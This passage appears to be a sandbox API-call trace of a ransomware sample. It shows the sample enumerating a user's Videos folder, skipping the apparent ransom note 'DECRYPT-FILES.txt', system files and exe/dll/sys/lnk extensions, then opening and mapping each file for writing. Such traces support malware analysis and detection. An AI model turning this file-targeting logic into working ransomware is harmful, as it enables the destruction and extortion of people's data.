dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.211] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.211] CloseHandle (hObject=0x268) returned 1 [0186.211] CloseHandle (hObject=0x264) returned 1 [0186.211] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.212] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa52ac5e0, ftCreationTime.dwHighDateTime=0x1d4d46b, ftLastAccessTime.dwLowDateTime=0x65cdd580, ftLastAccessTime.dwHighDateTime=0x1d4d1d3, ftLastWriteTime.dwLowDateTime=0xb0473fc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x7685, dwReserved0=0x0, dwReserved1=0x0, cFileName="ind-.avi.EouPMx", cAlternateFileName="IND-AV~1.EOU")) returned 1 [0186.212] lstrcmpiW (lpString1="ind-.avi.EouPMx", lpString2="DECRYPT-FILES.txt") returned 1 [0186.212] lstrcmpiW (lpString1="ind-.avi.EouPMx", lpString2="autorun.inf") returned 1 [0186.212] lstrcmpiW (lpString1="ind-.avi.EouPMx", lpString2="boot.ini") returned 1 [0186.212] lstrcmpiW (lpString1="ind-.avi.EouPMx", lpString2="desktop.ini") returned 1 [0186.212] lstrcmpiW (lpString1="ind-.avi.EouPMx", lpString2="ntuser.dat") returned -1 [0186.212] lstrcmpiW (lpString1="ind-.avi.EouPMx", lpString2="iconcache.db") returned 1 [0186.212] lstrcmpiW (lpString1="ind-.avi.EouPMx", lpString2="bootsect.bak") returned 1 [0186.212] lstrcmpiW (lpString1="ind-.avi.EouPMx", lpString2="ntuser.dat.log") returned -1 [0186.212] lstrcmpiW (lpString1="ind-.avi.EouPMx", lpString2="thumbs.db") returned -1 [0186.212] lstrcmpiW (lpString1="ind-.avi.EouPMx", lpString2="Bootfont.bin") returned 1 [0186.212] lstrlenW (lpString="ind-.avi.EouPMx") returned 15 [0186.212] lstrcmpiW (lpString1="EouPMx", lpString2="lnk") returned -1 [0186.212] lstrcmpiW (lpString1="EouPMx", lpString2="exe") returned -1 [0186.212] lstrcmpiW (lpString1="EouPMx", lpString2="sys") returned -1 [0186.212] lstrcmpiW (lpString1="EouPMx", lpString2="dll") returned 1 [0186.212] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.212] lstrlenW (lpString="ind-.avi.EouPMx") returned 15 [0186.212] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0186.212] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="ind-.avi.EouPMx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\ind-.avi.EouPMx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\ind-.avi.EouPMx" [0186.212] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.212] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\ind-.avi.EouPMx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\ind-.avi.eoupmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.214] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=30341) returned 1 [0186.214] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.214] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.214] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.215] CloseHandle (hObject=0x268) returned 1 [0186.215] CloseHandle (hObject=0x264) returned 1 [0186.215] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.215] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a33fd0, ftCreationTime.dwHighDateTime=0x1d4d047, ftLastAccessTime.dwLowDateTime=0xc8a2a890, ftLastAccessTime.dwHighDateTime=0x1d4d28a, ftLastWriteTime.dwLowDateTime=0xb049a120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa272, dwReserved0=0x0, dwReserved1=0x0, cFileName="IzbRoJNJtopbW6u9q.swf.l0s9Bl8", cAlternateFileName="IZBROJ~1.L0S")) returned 1 [0186.215] lstrcmpiW (lpString1="IzbRoJNJtopbW6u9q.swf.l0s9Bl8", lpString2="DECRYPT-FILES.txt") returned 1 [0186.215] lstrcmpiW (lpString1="IzbRoJNJtopbW6u9q.swf.l0s9Bl8", lpString2="autorun.inf") returned 1 [0186.215] lstrcmpiW (lpString1="IzbRoJNJtopbW6u9q.swf.l0s9Bl8", lpString2="boot.ini") returned 1 [0186.215] lstrcmpiW (lpString1="IzbRoJNJtopbW6u9q.swf.l0s9Bl8", lpString2="desktop.ini") returned 1 [0186.215] lstrcmpiW (lpString1="IzbRoJNJtopbW6u9q.swf.l0s9Bl8", lpString2="ntuser.dat") returned -1 [0186.215] lstrcmpiW (lpString1="IzbRoJNJtopbW6u9q.swf.l0s9Bl8", lpString2="iconcache.db") returned 1 [0186.215] lstrcmpiW (lpString1="IzbRoJNJtopbW6u9q.swf.l0s9Bl8", lpString2="bootsect.bak") returned 1 [0186.215] lstrcmpiW (lpString1="IzbRoJNJtopbW6u9q.swf.l0s9Bl8", lpString2="ntuser.dat.log") returned -1 [0186.215] lstrcmpiW (lpString1="IzbRoJNJtopbW6u9q.swf.l0s9Bl8", lpString2="thumbs.db") returned -1 [0186.215] lstrcmpiW (lpString1="IzbRoJNJtopbW6u9q.swf.l0s9Bl8", lpString2="Bootfont.bin") returned 1 [0186.215] lstrlenW (lpString="IzbRoJNJtopbW6u9q.swf.l0s9Bl8") returned 29 [0186.215] lstrcmpiW (lpString1="l0s9Bl8", lpString2="lnk") returned -1 [0186.215] lstrcmpiW (lpString1="l0s9Bl8", lpString2="exe") returned 1 [0186.215] lstrcmpiW (lpString1="l0s9Bl8", lpString2="sys") returned -1 [0186.215] lstrcmpiW (lpString1="l0s9Bl8", lpString2="dll") returned 1 [0186.215] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.215] lstrlenW (lpString="IzbRoJNJtopbW6u9q.swf.l0s9Bl8") returned 29 [0186.215] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0186.215] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="IzbRoJNJtopbW6u9q.swf.l0s9Bl8" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\IzbRoJNJtopbW6u9q.swf.l0s9Bl8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\IzbRoJNJtopbW6u9q.swf.l0s9Bl8" [0186.215] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.216] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\IzbRoJNJtopbW6u9q.swf.l0s9Bl8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\izbrojnjtopbw6u9q.swf.l0s9bl8"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.216] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=41586) returned 1 [0186.216] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.216] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.217] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.217] CloseHandle (hObject=0x268) returned 1 [0186.217] CloseHandle (hObject=0x264) returned 1 [0186.217] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.217] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5708b4f0, ftCreationTime.dwHighDateTime=0x1d4c5c3, ftLastAccessTime.dwLowDateTime=0x287ebf0, ftLastAccessTime.dwHighDateTime=0x1d4c76a, ftLastWriteTime.dwLowDateTime=0xb04e63e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x5e16, dwReserved0=0x0, dwReserved1=0x0, cFileName="KqLR.mp4.K5yE", cAlternateFileName="KQLRMP~1.K5Y")) returned 1 [0186.217] lstrcmpiW (lpString1="KqLR.mp4.K5yE", lpString2="DECRYPT-FILES.txt") returned 1 [0186.217] lstrcmpiW (lpString1="KqLR.mp4.K5yE", lpString2="autorun.inf") returned 1 [0186.217] lstrcmpiW (lpString1="KqLR.mp4.K5yE", lpString2="boot.ini") returned 1 [0186.217] lstrcmpiW (lpString1="KqLR.mp4.K5yE", lpString2="desktop.ini") returned 1 [0186.217] lstrcmpiW (lpString1="KqLR.mp4.K5yE", lpString2="ntuser.dat") returned -1 [0186.217] lstrcmpiW (lpString1="KqLR.mp4.K5yE", lpString2="iconcache.db") returned 1 [0186.217] lstrcmpiW (lpString1="KqLR.mp4.K5yE", lpString2="bootsect.bak") returned 1 [0186.217] lstrcmpiW (lpString1="KqLR.mp4.K5yE", lpString2="ntuser.dat.log") returned -1 [0186.217] lstrcmpiW (lpString1="KqLR.mp4.K5yE", lpString2="thumbs.db") returned -1 [0186.217] lstrcmpiW (lpString1="KqLR.mp4.K5yE", lpString2="Bootfont.bin") returned 1 [0186.217] lstrlenW (lpString="KqLR.mp4.K5yE") returned 13 [0186.217] lstrcmpiW (lpString1="K5yE", lpString2="lnk") returned -1 [0186.217] lstrcmpiW (lpString1="K5yE", lpString2="exe") returned 1 [0186.218] lstrcmpiW (lpString1="K5yE", lpString2="sys") returned -1 [0186.218] lstrcmpiW (lpString1="K5yE", lpString2="dll") returned 1 [0186.218] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.218] lstrlenW (lpString="KqLR.mp4.K5yE") returned 13 [0186.218] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0186.218] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="KqLR.mp4.K5yE" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\KqLR.mp4.K5yE") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\KqLR.mp4.K5yE" [0186.218] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.218] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\KqLR.mp4.K5yE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\kqlr.mp4.k5ye"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.218] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=24086) returned 1 [0186.218] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.218] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.219] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.219] CloseHandle (hObject=0x268) returned 1 [0186.219] CloseHandle (hObject=0x264) returned 1 [0186.219] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.219] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67808170, ftCreationTime.dwHighDateTime=0x1d4d179, ftLastAccessTime.dwLowDateTime=0xfd0aa830, ftLastAccessTime.dwHighDateTime=0x1d4d460, ftLastWriteTime.dwLowDateTime=0xb050c540, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xdfe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="NbYe.swf.ICsc7", cAlternateFileName="NBYESW~1.ICS")) returned 1 [0186.220] lstrcmpiW (lpString1="NbYe.swf.ICsc7", lpString2="DECRYPT-FILES.txt") returned 1 [0186.220] lstrcmpiW (lpString1="NbYe.swf.ICsc7", lpString2="autorun.inf") returned 1 [0186.220] lstrcmpiW (lpString1="NbYe.swf.ICsc7", lpString2="boot.ini") returned 1 [0186.220] lstrcmpiW (lpString1="NbYe.swf.ICsc7", lpString2="desktop.ini") returned 1 [0186.220] lstrcmpiW (lpString1="NbYe.swf.ICsc7", lpString2="ntuser.dat") returned -1 [0186.220] lstrcmpiW (lpString1="NbYe.swf.ICsc7", lpString2="iconcache.db") returned 1 [0186.220] lstrcmpiW (lpString1="NbYe.swf.ICsc7", lpString2="bootsect.bak") returned 1 [0186.220] lstrcmpiW (lpString1="NbYe.swf.ICsc7", lpString2="ntuser.dat.log") returned -1 [0186.220] lstrcmpiW (lpString1="NbYe.swf.ICsc7", lpString2="thumbs.db") returned -1 [0186.220] lstrcmpiW (lpString1="NbYe.swf.ICsc7", lpString2="Bootfont.bin") returned 1 [0186.220] lstrlenW (lpString="NbYe.swf.ICsc7") returned 14 [0186.220] lstrcmpiW (lpString1="ICsc7", lpString2="lnk") returned -1 [0186.220] lstrcmpiW (lpString1="ICsc7", lpString2="exe") returned 1 [0186.220] lstrcmpiW (lpString1="ICsc7", lpString2="sys") returned -1 [0186.220] lstrcmpiW (lpString1="ICsc7", lpString2="dll") returned 1 [0186.220] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.220] lstrlenW (lpString="NbYe.swf.ICsc7") returned 14 [0186.220] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0186.220] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="NbYe.swf.ICsc7" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\NbYe.swf.ICsc7") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\NbYe.swf.ICsc7" [0186.220] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.220] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\NbYe.swf.ICsc7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\nbye.swf.icsc7"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.221] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=57316) returned 1 [0186.221] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.221] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.221] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.221] CloseHandle (hObject=0x268) returned 1 [0186.221] CloseHandle (hObject=0x264) returned 1 [0186.222] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.222] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59fbdcc0, ftCreationTime.dwHighDateTime=0x1d4c701, ftLastAccessTime.dwLowDateTime=0x998c0470, ftLastAccessTime.dwHighDateTime=0x1d4c8d0, ftLastWriteTime.dwLowDateTime=0xb0558800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x16ff1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PTN5D3Sq_RRMjfg.flv.At9Rgv", cAlternateFileName="PTN5D3~1.AT9")) returned 1 [0186.222] lstrcmpiW (lpString1="PTN5D3Sq_RRMjfg.flv.At9Rgv", lpString2="DECRYPT-FILES.txt") returned 1 [0186.222] lstrcmpiW (lpString1="PTN5D3Sq_RRMjfg.flv.At9Rgv", lpString2="autorun.inf") returned 1 [0186.222] lstrcmpiW (lpString1="PTN5D3Sq_RRMjfg.flv.At9Rgv", lpString2="boot.ini") returned 1 [0186.222] lstrcmpiW (lpString1="PTN5D3Sq_RRMjfg.flv.At9Rgv", lpString2="desktop.ini") returned 1 [0186.222] lstrcmpiW (lpString1="PTN5D3Sq_RRMjfg.flv.At9Rgv", lpString2="ntuser.dat") returned 1 [0186.222] lstrcmpiW (lpString1="PTN5D3Sq_RRMjfg.flv.At9Rgv", lpString2="iconcache.db") returned 1 [0186.222] lstrcmpiW (lpString1="PTN5D3Sq_RRMjfg.flv.At9Rgv", lpString2="bootsect.bak") returned 1 [0186.222] lstrcmpiW (lpString1="PTN5D3Sq_RRMjfg.flv.At9Rgv", lpString2="ntuser.dat.log") returned 1 [0186.222] lstrcmpiW (lpString1="PTN5D3Sq_RRMjfg.flv.At9Rgv", lpString2="thumbs.db") returned -1 [0186.222] lstrcmpiW (lpString1="PTN5D3Sq_RRMjfg.flv.At9Rgv", lpString2="Bootfont.bin") returned 1 [0186.222] lstrlenW (lpString="PTN5D3Sq_RRMjfg.flv.At9Rgv") returned 26 [0186.222] lstrcmpiW (lpString1="At9Rgv", lpString2="lnk") returned -1 [0186.222] lstrcmpiW (lpString1="At9Rgv", lpString2="exe") returned -1 [0186.222] lstrcmpiW (lpString1="At9Rgv", lpString2="sys") returned -1 [0186.222] lstrcmpiW (lpString1="At9Rgv", lpString2="dll") returned -1 [0186.222] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.222] lstrlenW (lpString="PTN5D3Sq_RRMjfg.flv.At9Rgv") returned 26 [0186.222] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0186.222] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="PTN5D3Sq_RRMjfg.flv.At9Rgv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\PTN5D3Sq_RRMjfg.flv.At9Rgv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\PTN5D3Sq_RRMjfg.flv.At9Rgv" [0186.222] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.222] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\PTN5D3Sq_RRMjfg.flv.At9Rgv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\ptn5d3sq_rrmjfg.flv.at9rgv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.223] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=94193) returned 1 [0186.223] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.223] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.224] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.224] CloseHandle (hObject=0x268) returned 1 [0186.224] CloseHandle (hObject=0x264) returned 1 [0186.224] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.224] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x569589a0, ftCreationTime.dwHighDateTime=0x1d4d58e, ftLastAccessTime.dwLowDateTime=0x2d86d450, ftLastAccessTime.dwHighDateTime=0x1d4d49a, ftLastWriteTime.dwLowDateTime=0xb057e960, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x185a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="rqiWEc.flv.jIHLOI", cAlternateFileName="RQIWEC~1.JIH")) returned 1 [0186.224] lstrcmpiW (lpString1="rqiWEc.flv.jIHLOI", lpString2="DECRYPT-FILES.txt") returned 1 [0186.224] lstrcmpiW (lpString1="rqiWEc.flv.jIHLOI", lpString2="autorun.inf") returned 1 [0186.224] lstrcmpiW (lpString1="rqiWEc.flv.jIHLOI", lpString2="boot.ini") returned 1 [0186.224] lstrcmpiW (lpString1="rqiWEc.flv.jIHLOI", lpString2="desktop.ini") returned 1 [0186.224] lstrcmpiW (lpString1="rqiWEc.flv.jIHLOI", lpString2="ntuser.dat") returned 1 [0186.224] lstrcmpiW (lpString1="rqiWEc.flv.jIHLOI", lpString2="iconcache.db") returned 1 [0186.224] lstrcmpiW (lpString1="rqiWEc.flv.jIHLOI", lpString2="bootsect.bak") returned 1 [0186.224] lstrcmpiW (lpString1="rqiWEc.flv.jIHLOI", lpString2="ntuser.dat.log") returned 1 [0186.224] lstrcmpiW (lpString1="rqiWEc.flv.jIHLOI", lpString2="thumbs.db") returned -1 [0186.224] lstrcmpiW (lpString1="rqiWEc.flv.jIHLOI", lpString2="Bootfont.bin") returned 1 [0186.224] lstrlenW (lpString="rqiWEc.flv.jIHLOI") returned 17 [0186.224] lstrcmpiW (lpString1="jIHLOI", lpString2="lnk") returned -1 [0186.224] lstrcmpiW (lpString1="jIHLOI", lpString2="exe") returned 1 [0186.224] lstrcmpiW (lpString1="jIHLOI", lpString2="sys") returned -1 [0186.224] lstrcmpiW (lpString1="jIHLOI", lpString2="dll") returned 1 [0186.224] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.224] lstrlenW (lpString="rqiWEc.flv.jIHLOI") returned 17 [0186.224] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0186.224] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="rqiWEc.flv.jIHLOI" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\rqiWEc.flv.jIHLOI") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\rqiWEc.flv.jIHLOI" [0186.225] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.225] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\rqiWEc.flv.jIHLOI" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\rqiwec.flv.jihloi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.225] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=99747) returned 1 [0186.225] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.225] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.226] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.226] CloseHandle (hObject=0x268) returned 1 [0186.226] CloseHandle (hObject=0x264) returned 1 [0186.226] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.226] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fefd820, ftCreationTime.dwHighDateTime=0x1d4cf83, ftLastAccessTime.dwLowDateTime=0xadfedae0, ftLastAccessTime.dwHighDateTime=0x1d4cf79, ftLastWriteTime.dwLowDateTime=0xb05cac20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1ed6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rw_rswFYcem6TM.mp4.z1W12f3", cAlternateFileName="RW_RSW~1.Z1W")) returned 1 [0186.226] lstrcmpiW (lpString1="Rw_rswFYcem6TM.mp4.z1W12f3", lpString2="DECRYPT-FILES.txt") returned 1 [0186.226] lstrcmpiW 